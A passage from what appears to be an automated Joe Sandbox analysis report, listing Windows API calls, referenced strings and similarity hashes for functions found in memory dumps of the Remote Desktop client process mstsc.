  • Part of subcall function 0093D3B6: SendDlgItemMessageW.USER32(?,00003344,000000F0,00000000,00000000,00000001,000000FC,00003AA2,0093CAC7,00000001,TscProxyLinkDelSavedCreds,000000FC), ref: 0093D3D4
• memset.MSVCRT ref: 0093CADF
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Message$AddressFreeHandleItemLibraryModuleProcSendTracememset
• String ID: GetEffectiveAuthMode failed!$O3$StringCchLength failed$TscProxyLinkDelSavedCreds
• API String ID: 3255493412-3188623267
• Opcode ID: c6de4d69da08b57f583b2588dbca8f4c3bb47ad3b68e09b79983070907508176
• Instruction ID: f0ca3cdb60b66f9fec349eca5d1a61178280a1bea82aade8c5e0cb1efa31e459
• Opcode Fuzzy Hash: c6de4d69da08b57f583b2588dbca8f4c3bb47ad3b68e09b79983070907508176
• Instruction Fuzzy Hash: 0471D2B1A44718ABDB30DB68DC4DBAAB6B9AB48310F1004E9F509B72D1CB749E84CF45
APIs
• memset.MSVCRT ref: 0093D231
• memset.MSVCRT ref: 0093D24B
• memset.MSVCRT ref: 0093D265
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
Strings
• GetEffectiveServerName failed!, xrefs: 0093D2B2
• Failed to create temporary AA profile, xrefs: 0093D33D
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: memset$AddressFreeHandleLibraryMessageModuleProcTrace
• String ID: Failed to create temporary AA profile$GetEffectiveServerName failed!
• API String ID: 2883347319-1722353693
• Opcode ID: a40828c9555b8382e0b35643b02e9bfc192a89ee8c1b6ed0bd194156821f0837
• Instruction ID: 4ca39faf0df5fbdfa8a4585d08097dd83c2ff3b9f3ee69b54359d9bd272d10c2
• Opcode Fuzzy Hash: a40828c9555b8382e0b35643b02e9bfc192a89ee8c1b6ed0bd194156821f0837
• Instruction Fuzzy Hash: B441B271A002086FDB25DF64DC99FAB77AEAFC8304F1004ADF40597251DA71ED958F51
APIs
• EnableWindow.USER32(?,00000000), ref: 00962298
• EnableWindow.USER32(?,00000000), ref: 009622B5
• CheckDlgButton.USER32(?,00003301,00000000), ref: 009622DD
• CheckDlgButton.USER32(?,00003301,00000001), ref: 00962303
• CheckDlgButton.USER32(?,000036C6,00000000), ref: 0096230F
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ButtonCheck$EnableWindow
• String ID:
• API String ID: 9982438-0
• Opcode ID: 17f1dd75425cc83ee3d06ab6f943e0bb2d322e52689103029c5337ee5b5ce0f1
• Instruction ID: 96932145a65cdd2ebb0993130a7e24d86d4b1ae271c73576c37239a0c71ff9a3
• Opcode Fuzzy Hash: 17f1dd75425cc83ee3d06ab6f943e0bb2d322e52689103029c5337ee5b5ce0f1
• Instruction Fuzzy Hash: D221D130A10516EFD718DF20CC94F3ABBA9FF48740F200569E916DB6A0DB71AD54DB80
APIs
• memset.MSVCRT ref: 0093D0F7
  • Part of subcall function 00958E3E: ??2@YAPAXI@Z.MSVCRT ref: 00958E50
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Strings
• GetEffectiveServerName failed!, xrefs: 0093D188
• TERMSRV, xrefs: 0093D1DC
• CTSCredManAssistant::CreateInstance failed!, xrefs: 0093D13C
• TscProxyLinkDelSavedCreds, xrefs: 0093D0DD
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ??2@AddressFreeHandleLibraryModuleProcmemset
• String ID: CTSCredManAssistant::CreateInstance failed!$GetEffectiveServerName failed!$TERMSRV$TscProxyLinkDelSavedCreds
• API String ID: 4238993307-2018271670
• Opcode ID: c4ca8f68f7f2069665aa57e0a76d84fb51e5fe47e2352ab2ecfc13bf2b77bfdd
• Instruction ID: a68e64799b43b9f661254cbdab456c1f91d183ba3315e61cea077e60359f48db
• Opcode Fuzzy Hash: c4ca8f68f7f2069665aa57e0a76d84fb51e5fe47e2352ab2ecfc13bf2b77bfdd
• Instruction Fuzzy Hash: 7B310432608308AFEB29EF94DC59FAA77B9AB84304F04049DF90597091DA70ED94DF51
APIs
• CloseHandle.KERNEL32(?), ref: 0095BB5D
• ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0095BB0F), ref: 0095BB79
• SysFreeString.OLEAUT32(?), ref: 0095BBB3
• SysFreeString.OLEAUT32(?), ref: 0095BBBB
• FreeLibrary.KERNEL32(?,?,?,?,0095BB0F), ref: 0095BBC8
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Free$String$??3@CloseHandleLibrary
• String ID:
• API String ID: 122121376-0
• Opcode ID: f0e45fa68fdb1f09123d153c44587e26b5c41763078337db0771498b5a8390c6
• Instruction ID: 7d9f41118f8e5d341c24fe0c9942d22e2d11ef6aa07898c381325ce4ce8bdcde
• Opcode Fuzzy Hash: f0e45fa68fdb1f09123d153c44587e26b5c41763078337db0771498b5a8390c6
• Instruction Fuzzy Hash: E2311BB4601B02EFC718CF66D988A55FBE9FF08316754422DE85987A60CBB1E864DFC0
APIs
• malloc.MSVCRT ref: 00947B2F
• free.MSVCRT ref: 00947B8F
• memcpy.MSVCRT(00000000,?,?), ref: 00947BB6
  • Part of subcall function 00964E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0096A020,00000000,00000000,00000000), ref: 00964E6E
  • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ActivityControlEventMessageTracefreemallocmemcpy
• String ID: alloc memory for m_PreAuthCookie$preAuthCookie
• API String ID: 3016499739-513349929
• Opcode ID: 5e9e30c1e3eaedc782bde92783bb3b1b5a3309ebd7bb3dd21231447d836470de
• Instruction ID: 1fd1fc40528d17277a413c5bf7b155497186e8062f3fd3e4d863cbc003fe1022
• Opcode Fuzzy Hash: 5e9e30c1e3eaedc782bde92783bb3b1b5a3309ebd7bb3dd21231447d836470de
• Instruction Fuzzy Hash: 67216B726083086FCB259F64DC46F57B79AEBC4324F140068F844971A2DB31CC55DBD1
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0093D9DD
• SendMessageW.USER32(?,00001127,00000000,0000F000), ref: 0093D9F6
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 0093DA1E
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0093DA57
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 0093DA68
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: 539358f75351a06175f98d8fb8fdf90ee3356ae3d99199e4a65c9c208768651a
                                                                                                                                                                                    • Instruction ID: eed0e219747974ed9afec21cd37efae9fbb91975da8d6b98d525d3c303a96ef4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 539358f75351a06175f98d8fb8fdf90ee3356ae3d99199e4a65c9c208768651a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6521A171E02225BBDB258A659D51BEDBBA8FF04760F014125FA05AB2C0D671DD50CBD4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,0096A2E0), ref: 009370F6
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00937107
                                                                                                                                                                                    • MapWindowPoints.USER32 ref: 00937116
                                                                                                                                                                                    • OffsetRect.USER32 ref: 00937125
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000005), ref: 00937139
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ItemOffsetPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3327997973-0
                                                                                                                                                                                    • Opcode ID: 318854dfc9b2ec7406e8f7c0cbba0a67cab629ed337d6dd3359fb1ac05de46b8
                                                                                                                                                                                    • Instruction ID: 4f1c580d39a8282df9589bcfe158ee343942df8db19e83d268fd79b250efda15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 318854dfc9b2ec7406e8f7c0cbba0a67cab629ed337d6dd3359fb1ac05de46b8
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF1173B2608209AFDB119FE5DC45EBFBB7CEB49701F004429FA41D2150DB7099129FA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(00000000,00000003), ref: 0095118C
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0095119D
                                                                                                                                                                                    • MapWindowPoints.USER32 ref: 009511AE
                                                                                                                                                                                    • OffsetRect.USER32 ref: 009511BD
                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000005,00000000,00000000,00000005), ref: 009511D1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ItemOffsetPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3327997973-0
                                                                                                                                                                                    • Opcode ID: 750887084bf9abf4c43b66a253c5c1646fed2094b1309f77d6571b48c5eee72a
                                                                                                                                                                                    • Instruction ID: 737e94bb90ff21ec0cc89b4df9991a158a33ef6c2b7417e550f92d0df1072d46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 750887084bf9abf4c43b66a253c5c1646fed2094b1309f77d6571b48c5eee72a
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC112BB2608209AFDB01DFE5DD49FBFBBBCEB08301F104469FA41A2151CB70A915DBA1
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023022F4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 02302328
                                                                                                                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023022FC
                                                                                                                                                                                    • RTL: Resource at %p, xrefs: 0230230B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                    • API String ID: 885266447-871070163
                                                                                                                                                                                    • Opcode ID: 4e791ec6e0493297603a4e1186a65d7e386e88ccd85e247b29290d41dd1c6f04
                                                                                                                                                                                    • Instruction ID: 9f25395b88fea72606a740f65d59d9861b716df1933d3e43feab33ee8812f540
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e791ec6e0493297603a4e1186a65d7e386e88ccd85e247b29290d41dd1c6f04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44510B716217016BEF21DBA4CC94FA7739DAF48324F214259FD05DF284EB61E841CBA0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023024BD
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 023024FA
                                                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0230248D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                                                    • Opcode ID: 1ff96415af520916c29ac46d493bf2145cdd8ed9a0d217d8f8d0c34618e08d04
                                                                                                                                                                                    • Instruction ID: 93a6b678506cc3690879e634b506348b8665afc523442515f5fa47b7da9de530
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ff96415af520916c29ac46d493bf2145cdd8ed9a0d217d8f8d0c34618e08d04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6341D370610304ABDB20EFA8CC99FAB77BAAF44720F218649F9559B2C4D774E941CB71
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00914F5C,?,00000000), ref: 00915A89
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
                                                                                                                                                                                    • DeleteFileW.KERNEL32(009691C0,?,?,?,?,?,?,00914F5C,?,00000000), ref: 00915B3F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to start remote application, xrefs: 00915AC7
                                                                                                                                                                                    • Invalid CopyData params, xrefs: 00915B05
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$AddressDeleteFileFreeLibraryMessageProcTrace
                                                                                                                                                                                    • String ID: Failed to start remote application$Invalid CopyData params
                                                                                                                                                                                    • API String ID: 2091952702-75341140
                                                                                                                                                                                    • Opcode ID: a2397b7146012bf060a3df6041190fabaff08d9439b9261e80b53ff7be1114d8
                                                                                                                                                                                    • Instruction ID: 12081bbb4f94e51f302b0a34160c01e9b4bd40005881c097a6c00b1874d08080
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2397b7146012bf060a3df6041190fabaff08d9439b9261e80b53ff7be1114d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1241C331788709EFDB298F54D849FA63AAAAFC4300B17405CF9019B2A1DAB0DCC0DB50
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000004,00000080,00000000), ref: 009582DE
                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,009581B1,?,00000000), ref: 009582EC
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 00910EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,0090B78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0096A020,00000000,0096A020), ref: 00910F32
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Unable to initialize file name from moniker!, xrefs: 00958206
                                                                                                                                                                                    • Failed to close file stream!, xrefs: 00958299
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCreateErrorFileFreeHandleLastLibraryMessageModuleProcTrace
                                                                                                                                                                                    • String ID: Failed to close file stream!$Unable to initialize file name from moniker!
                                                                                                                                                                                    • API String ID: 3465984092-1650752352
                                                                                                                                                                                    • Opcode ID: fbde62c779ee6a1d05972c8a6693a30e1a686af7dd3cb73cfd681c13c18c3716
                                                                                                                                                                                    • Instruction ID: 841f9618d75bebf58d2393c6512f7cf812b438a677b64d63e317b151714b5e01
                                                                                                                                                                                    • Opcode Fuzzy Hash: fbde62c779ee6a1d05972c8a6693a30e1a686af7dd3cb73cfd681c13c18c3716
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F410432A14B15AFD725CF56C848F227A99BB09B51F040159FD10FB2A2CB70DC94AF81
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExtractIconW.SHELL32(?,00000440,00000000), ref: 0092294D
                                                                                                                                                                                    • LoadIconW.USER32 ref: 00922960
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                      • Part of subcall function 009110B1: TraceMessage.ADVAPI32(00000000,0091396B,0000002B,00907B50,0000000D,00943C39,00000004,00000000,?,00943C39,0091396B,00000000,00000000), ref: 009110C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Icon$AddressExtractFreeHandleLibraryLoadMessageModuleProcTrace
                                                                                                                                                                                    • String ID: Icon File$Icon Index
                                                                                                                                                                                    • API String ID: 494351486-3007940515
                                                                                                                                                                                    • Opcode ID: d6775b28fe2a46101f03c171ec809347d1a7bb90bc6b16fd131e853af0724e3b
                                                                                                                                                                                    • Instruction ID: ad2e1e8c1ff42ebc38eed7abed3bf5c9be61f479bd2423877481eaaa48f878ae
                                                                                                                                                                                    • Opcode Fuzzy Hash: d6775b28fe2a46101f03c171ec809347d1a7bb90bc6b16fd131e853af0724e3b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41BF357143447FD7299F24AC49F967BDEBB88314F040019FA00A72E6CBB4D8909B91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CM_Get_DevNode_Registry_PropertyW.CFGMGR32(00000000,00000003,?,00000000,?,00000000,?,?,00000000,?,?,0093F51F,?,?), ref: 0093F3A8
                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,0093F51F,?,?,?,?,?,?,0093F653,?,?,?), ref: 0093F3CC
                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,0093F51F,?,?,?,?,?,?,0093F653,?,?,?), ref: 0093F456
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Get_Node_PropertyRegistry_
                                                                                                                                                                                    • String ID: USB\Class_07
                                                                                                                                                                                    • API String ID: 4267041287-3744949717
                                                                                                                                                                                    • Opcode ID: 563e200b99d5f484b5c0fa2d3c828282e3b2b07a17161f899fee409b935d49af
                                                                                                                                                                                    • Instruction ID: 5168ce283e0fbbdb39277c36d22d288c5883331d6f52f9822972f51091b3795c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 563e200b99d5f484b5c0fa2d3c828282e3b2b07a17161f899fee409b935d49af
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7310972E00101ABCB34AF68D86D6BFB3A9EB44754F55407DE90ADB290EB718D418B90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • TlsFree.KERNEL32(?,0096BAA0,00000000,?,0096611F,?,00000001,?,00000000,00000000,0096AF68,?,00000001,00000000), ref: 0096614C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Failed to terminate timer globals, xrefs: 00966183
                                                                                                                                                                                    • Failed to unregister the thread window class, xrefs: 009661C3
                                                                                                                                                                                    • Failed to unregister the timer window class, xrefs: 00966203
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free
                                                                                                                                                                                    • String ID: Failed to terminate timer globals$Failed to unregister the thread window class$Failed to unregister the timer window class
                                                                                                                                                                                    • API String ID: 3978063606-2031851587
                                                                                                                                                                                    • Opcode ID: 983b70ff970b450ce537f8fbf2b503faec3b77a43f1137766819a5393da1cc10
                                                                                                                                                                                    • Instruction ID: 0c0a040ffc21a593cf00faa2a6003dcb9b812e84febb778dd8afa3d5cf16b6b8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 983b70ff970b450ce537f8fbf2b503faec3b77a43f1137766819a5393da1cc10
                                                                                                                                                                                    • Instruction Fuzzy Hash: D731B471B183446FEB2A9FA1EC59B263B9ABBC9354F19044DE400D61B2C7B1CC82EF51
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                    • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@
                                                                                                                                                                                    • String ID: %s/%s$TERMSRV
                                                                                                                                                                                    • API String ID: 1033339047-1026481303
                                                                                                                                                                                    • Opcode ID: a49b3f2540748166b1279ea40ef86377bb4a446bbc0c7894559379ba9123ef61
                                                                                                                                                                                    • Instruction ID: a737e58a9f01adf4354629f2e8c6409607ae14017584a57dcd4cefed529d0331
